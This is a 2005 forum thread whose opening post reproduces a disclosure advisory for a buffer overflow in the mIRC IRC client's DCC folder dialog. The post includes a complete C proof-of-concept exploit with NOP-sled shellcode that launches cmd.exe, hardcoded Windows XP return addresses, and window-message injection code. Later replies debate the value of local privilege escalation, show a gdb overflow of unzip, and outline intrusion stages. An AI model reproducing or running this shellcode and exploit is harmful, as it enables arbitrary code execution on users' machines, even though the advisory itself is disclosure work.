Author Topic: mIRC Exploit Found  (Read 6821 times)

0 Members and 1 Guest are viewing this topic.

Offline deadly7

  • 42
  • x86
  • Hero Member
  • *****
  • Posts: 6496
    • View Profile
mIRC Exploit Found
« on: December 21, 2005, 09:53:17 pm »
- 1 - Introduction

Written by Khaled Mardam-Bey, mIRC is a friendly IRC client that is
well equipped with options and tools.

- 2 - Vulnerability description

Tested on mIRC 6.16,6.12,6.03 and 5.91, all result vulnerable.
Possibly all mIRC versions are vulnerable.
The code executed are with current user privileges,anyway this bug
could be dangerous in universities,
cyber coffees, schools and any location with restrictions.
Adding/editing filters to locate the specified folder for the files
transfered by DCC if insert a string greater
or equal to 981 bytes the application crash showing an memory error 0x0000.
This 0x0000 error it's because shows the value of the second edit
field and it's empty, if write AAAA in this field,
the error it's 0x41414141, overwrite the eip and can take the control
to execute arbitrary code.
To execute code appears a little problem, only can write 39chars in
the second edit, this problem imposibilite insert
a good shellcode, to fix this, can put jmp esp + sub esp 0x74 + jmp
esp, with this, the EIP it's overwrited by the text
in the first edit field, and in this have 980bytes for the shellcode.

- 3 - How to exploit it

This PoC open a cmd.exe,also it's possible execute any other code.

----------- CUT HERE ----------------------
/*
mIRCexploitXPSP2eng.c
Vulnerability tested on Windows XP SP1,SP2 Spanish
and Windows XP SP2 English

This PoC it's for XP SP2 English, for spanish readers:

XP SP1
system: 0x77bf8044
jmp esp: 0x77E29BBB (advapi32.dll)

XP SP2
system: 0x77bf93c7
jmp esp: 0x77E37BBB (advapi32.dll)

Special thanks to rojodos (very great your tutorial),
jocanor, otromasf, crazyking and gandalfj.
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main () {
HWND lHandle, lHandledit, lHandledit2;
char strClass[30];
char shellcode[999]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x55"
"\x8B\xEC"
"\x33\xFF"
"\x57"
"\x83\xEC\x04"
"\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D"
"\xC6\x45\xFA\x64"
"\xC6\x45\xFB\x2E"
"\xC6\x45\xFC\x65"
"\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65"
"\x8D\x45\xF8"
"\x50"
"\xBB\xc7\x93\xc2\x77"
"\xFF\xD3"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90";

//Shellcode system("cmd.exe"), system in \xc7\x93\xc2\x77 77c293c7
(WinXP Sp2 English)

char saltaoffset[]="\xD6\xD1\xE5\x77\x90\x90\x90\x90\x90\x83\xEC\x74\xFF\xE4\x90\x90";
// jmp esp 0x77E5D1D6 (advapi32.dll) , sub esp 0x74, jmp esp

lHandle=FindWindow(NULL, "DCC Get Folder");

if (!lHandle)
{
printf("\nCan't find mIRC DCC Get Folder Dialog :\nIn mIRC
Options/DCC/Folders push ADD\n");
return 0;
}
else
{ printf("handle for mIRC DCC Get Folder Dialog : 0x%X\n",lHandle); }

SetForegroundWindow(lHandle);
lHandledit = FindWindowEx(lHandle, 0, "Edit", 0);
printf("handle for First Edit : 0x%X\n",lHandledit);
printf("ASCII Shellcode in first edit : %s\n", shellcode);
SendMessage(lHandledit, WM_SETTEXT,0,(LPARAM)shellcode);


lHandledit2 = GetWindow(lHandledit, GW_HWNDNEXT);
GetClassName(lHandledit2, strClass, sizeof(strClass));

while ( lstrcmp(strClass,"Edit") )
{
lHandledit2 = GetWindow(lHandledit2, GW_HWNDNEXT);
GetClassName(lHandledit2, strClass, sizeof(strClass));
}

printf("handle for Second Edit : 0x%X\n",lHandledit2);
Sleep(500);
printf("ASCII Shellcode in second edit : %s\n", saltaoffset);
SendMessage(lHandledit2, WM_SETTEXT,0,(LPARAM)saltaoffset);
Sleep(500);
SendMessage (lHandledit2, WM_IME_KEYDOWN, VK_RETURN, 0);
}

----------- CUT HERE ----------------------


- 4 - Solution

I contacted with khaled in khaled@mirc.com reporting the bug on
29/11/2005 without response.
Contacting again with this advisory.


- 5 - Credits

URL Vendor: www.mirc.com
Author: Jordi Corrales ( crowdat[at]gmail.com )
Date: 09/12/2005

Spanish and English Advisory: http://www.shellsec.net/leer_advisory.php?id=9
Spanish Advisory and Compiled Spanish Exploit:
http://www.cyruxnet.org/mirc616_bug_exploit.htm

--------------
That's neat that someone figured out how to do that. I wouldn't be smart enough to program in assembly (that's what it looks like to me, stfu!) for a couple years.  Mainly because I have no drive.
[17:42:21.609] <Ergot> Kutsuju you're girlfrieds pussy must be a 403 error for you
 [17:42:25.585] <Ergot> FORBIDDEN

on IRC playing T&T++
<iago> He is unarmed
<Hitmen> he has no arms?!

on AIM with a drunk mythix:
(00:50:05) Mythix: Deadly
(00:50:11) Mythix: I'm going to fuck that red dot out of your head.
(00:50:15) Mythix: with my nine

Offline zorm

  • Hero Member
  • *****
  • Posts: 591
    • View Profile
    • Zorm's Page
Re: mIRC Exploit Found
« Reply #1 on: December 22, 2005, 03:06:17 pm »
At first I thought this might be something neat and then i realized its a local exploit and totally lame. :(
"Frustra fit per plura quod potest fieri per pauciora"
- William of Ockham

Offline Quik

  • Webmaster Guy
  • x86
  • Hero Member
  • *****
  • Posts: 3262
  • \x51 \x75 \x69 \x6B \x5B \x78 \x38 \x36 \x5D
    • View Profile
Re: mIRC Exploit Found
« Reply #2 on: December 22, 2005, 04:18:11 pm »
At first I thought this might be something neat and then i realized its a local exploit and totally lame. :(

Yeah, I looked at this and that was exactly my thoughts.

"WHAT THE FUCK PURPOSE CAN THIS SERVE?!"

Local priviledge escalation is not cool, especially on Windows.
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Offline mynameistmp

  • Full Member
  • ***
  • Posts: 111
  • Hi! I'm new here!
    • View Profile
Re: mIRC Exploit Found
« Reply #3 on: December 23, 2005, 06:43:05 pm »
At first I thought this might be something neat and then i realized its a local exploit and totally lame. :(

Yeah, I looked at this and that was exactly my thoughts.

"WHAT THE FUCK PURPOSE CAN THIS SERVE?!"

Local priviledge escalation is not cool, especially on Windows.

Local privilege* escalation is more important than you may think.

Offline Quik

  • Webmaster Guy
  • x86
  • Hero Member
  • *****
  • Posts: 3262
  • \x51 \x75 \x69 \x6B \x5B \x78 \x38 \x36 \x5D
    • View Profile
Re: mIRC Exploit Found
« Reply #4 on: December 24, 2005, 01:36:41 am »
At first I thought this might be something neat and then i realized its a local exploit and totally lame. :(

Yeah, I looked at this and that was exactly my thoughts.

"WHAT THE FUCK PURPOSE CAN THIS SERVE?!"

Local priviledge escalation is not cool, especially on Windows.

Local privilege* escalation is more important than you may think.

I'm sorry if I can't spell.

Yes, it's interesting on Linux, but when there are issues on Windows that allow you to get admin accounts by just sitting down at a computer, even on XP, that have been unpatched for a while now, this one limited thing isn't all that special. Remember, mIRC can't run on Linux. ;)
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: mIRC Exploit Found
« Reply #5 on: December 24, 2005, 03:05:58 am »
At first I thought this might be something neat and then i realized its a local exploit and totally lame. :(

Yeah, I looked at this and that was exactly my thoughts.

"WHAT THE FUCK PURPOSE CAN THIS SERVE?!"

Local priviledge escalation is not cool, especially on Windows.

Local privilege* escalation is more important than you may think.

Why would mIRC be running on windows with Adminstrative privileges while being used by a user that doesnt' have admin?  It would only make sense if it was a set-uid program..

Offline mynameistmp

  • Full Member
  • ***
  • Posts: 111
  • Hi! I'm new here!
    • View Profile
Re: mIRC Exploit Found
« Reply #6 on: December 26, 2005, 07:16:52 pm »
At first I thought this might be something neat and then i realized its a local exploit and totally lame. :(

Yeah, I looked at this and that was exactly my thoughts.

"WHAT THE FUCK PURPOSE CAN THIS SERVE?!"

Local priviledge escalation is not cool, especially on Windows.

Local privilege* escalation is more important than you may think.

Why would mIRC be running on windows with Adminstrative privileges while being used by a user that doesnt' have admin?  It would only make sense if it was a set-uid program..

Wether this particular exploit is useful or not, I don't know. I'm saying local privilege escalation, regardless of OS, _is_ "cool".

Offline Quik

  • Webmaster Guy
  • x86
  • Hero Member
  • *****
  • Posts: 3262
  • \x51 \x75 \x69 \x6B \x5B \x78 \x38 \x36 \x5D
    • View Profile
Re: mIRC Exploit Found
« Reply #7 on: December 26, 2005, 10:30:41 pm »
At first I thought this might be something neat and then i realized its a local exploit and totally lame. :(

Yeah, I looked at this and that was exactly my thoughts.

"WHAT THE FUCK PURPOSE CAN THIS SERVE?!"

Local priviledge escalation is not cool, especially on Windows.

Local privilege* escalation is more important than you may think.

Why would mIRC be running on windows with Adminstrative privileges while being used by a user that doesnt' have admin?  It would only make sense if it was a set-uid program..

Wether this particular exploit is useful or not, I don't know. I'm saying local privilege escalation, regardless of OS, _is_ "cool".

You're not "cool".

I agree, although perhaps not with the "regardless of OS" comment.
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: mIRC Exploit Found
« Reply #8 on: December 27, 2005, 04:01:47 pm »
Wether this particular exploit is useful or not, I don't know. I'm saying local privilege escalation, regardless of OS, _is_ "cool".

All right, then I fully agree.  This exploit does seem useless, it's just like the old unzip exploit:

Quote
iago@slayer:~$ gdb -q unzip
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) run `perl -e 'print "A"x50000'`
Starting program: /usr/bin/unzip `perl -e 'print "A"x50000'`
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Sure, I can overflow unzip locally, but who cares?  I could even very easily write exploit code for it, but again, there's no reason to. 

But you're absolutely correct, local privilege elevation is a very important step if you're exploiting somebody. 

Offline Quik

  • Webmaster Guy
  • x86
  • Hero Member
  • *****
  • Posts: 3262
  • \x51 \x75 \x69 \x6B \x5B \x78 \x38 \x36 \x5D
    • View Profile
Re: mIRC Exploit Found
« Reply #9 on: December 27, 2005, 04:17:05 pm »
But you're absolutely correct, local privilege elevation is a very important step if you're exploiting somebody. 

wtf? of course it is, it's the entire point.
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: mIRC Exploit Found
« Reply #10 on: December 27, 2005, 04:24:34 pm »
But you're absolutely correct, local privilege elevation is a very important step if you're exploiting somebody. 

wtf? of course it is, it's the entire point.

No, getting the ability to install/run a particular program is the entire point.  The program may or may not require root privileges.  There are many steps to it:

- Footprinting the network, finding a way in
- Finding the server you need
- Finding a vulnerability in the exterior of the server
- Finding a privilege escalation vulnerability, if necessary
- Stealing the file/information/planting a file to prove you were there/etc.

It's just one part.  The goal can, of course, vary a lot. 

Offline Quik

  • Webmaster Guy
  • x86
  • Hero Member
  • *****
  • Posts: 3262
  • \x51 \x75 \x69 \x6B \x5B \x78 \x38 \x36 \x5D
    • View Profile
Re: mIRC Exploit Found
« Reply #11 on: December 27, 2005, 06:35:29 pm »
But you're absolutely correct, local privilege elevation is a very important step if you're exploiting somebody. 

wtf? of course it is, it's the entire point.

No, getting the ability to install/run a particular program is the entire point.  The program may or may not require root privileges.  There are many steps to it:

- Footprinting the network, finding a way in
- Finding the server you need
- Finding a vulnerability in the exterior of the server
- Finding a privilege escalation vulnerability, if necessary
- Stealing the file/information/planting a file to prove you were there/etc.

It's just one part.  The goal can, of course, vary a lot. 


But it's usually the main objective, hence the term "rooting" being popular.
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: mIRC Exploit Found
« Reply #12 on: December 28, 2005, 01:06:59 pm »
But it's usually the main objective, hence the term "rooting" being popular.

The objective is frequently to deface a website.  Root isn't required for that.

The object is also frequently to steal information.  Root also isn't required for that. 

The point is, it's not always the objective.  It depends on what you're actually doing.  "rooting" is an over-used word.

Offline ink

  • Newbie
  • *
  • Posts: 74
    • View Profile
Re: mIRC Exploit Found
« Reply #13 on: February 14, 2006, 03:22:46 pm »
this could possibly be useful if you found a computer that had maybe default realvnc or radmin password set except the user that is logged in at the time doesn't have full admin access

... wait this is for mIRC, wtf